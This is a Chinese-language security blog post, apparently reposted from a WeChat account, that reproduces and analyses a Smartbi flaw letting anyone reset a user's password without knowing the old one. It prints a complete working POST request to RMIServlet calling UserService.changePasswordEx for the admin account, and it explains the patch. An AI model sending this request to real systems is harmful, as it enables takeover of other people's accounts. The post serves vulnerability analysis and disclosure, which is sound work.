Smartbi 修改用户密码漏洞

admin

102800
文章

87
评论

2023年8月21日00:33:44评论19 views字数 1078阅读3分35秒阅读模式

漏洞简介

通过查看 Smartbi 的补丁包信息，发现存在漏洞在某种特定情况下修改用户的密码，进行简单的复现和分析

Smartbi 修改用户密码漏洞

漏洞复现

在页面上修改密码时，需要知道原本的用户对应的密码

Smartbi 修改用户密码漏洞

直接构造这样的数据包，就不需要知道原本的密码，知道用户名就可以修改密码

POST /smartbi/vision/RMIServlet HTTP/1.1
Host: 192.168.222.133:18080
Content-Length: 73
Cache-Control: max-age=0
If-Modified-Since: 0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Accept: */*
Origin: http://192.168.222.133:18080
Referer: http://192.168.222.133:18080/smartbi/vision/index.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=4A4AC06EC1DF3CDDC45239C211926FA1
Connection: close

className=UserService&methodName=changePasswordEx&params=["admin","","1"]

漏洞分析

smartbi.usermanager.ILocalUserManagerModule#changePasswordEx

smartbi.usermanager.UserManagerModule#changePasswordEx

修改密码的操作虽然获取了用户名原本的密码修改后的新密码，但是对原本的密码并没有做任何校验处理

userId 是根据传入的用户名查询到的

smartbi.usermanager.UserManagerModule#updateUserEx

smartbi.usermanager.UserManagerModule#updateUserExtend

漏洞修复

上传补丁包后再发送数据包，发现被拦截

Smartbi 修改用户密码漏洞

‍

Smartbi 修改用户密码漏洞

匹配到对应的类名和方法就结束执行

原文始发于微信公众号（合天网安实验室）：Smartbi 修改用户密码漏洞

左青龙
微信扫一扫

右白虎
微信扫一扫

Smartbi 修改用户密码漏洞

漏洞简介

漏洞复现

漏洞分析

漏洞修复

Linux 网络 ELI5 — 第 1 部分，网络和接口

暗网简介：Molerats

kalilinux虚拟机安装完整过程

THM平台|Dogcat靶机记录

Hackerone 被黑，看我如何窃取你的POC！

【免杀】记一次lnk钓鱼小技巧

网络虚拟化技术：VXLAN，与VLAN有啥区别？

ARP:地址解析协议

[AI安全论文] (32)南洋理工大学刘杨教授——网络空间安全和AIGC整合之道学习笔记及强推（InForSec）

任意用户登录漏洞挖掘思路

发表评论

在线咨询

微信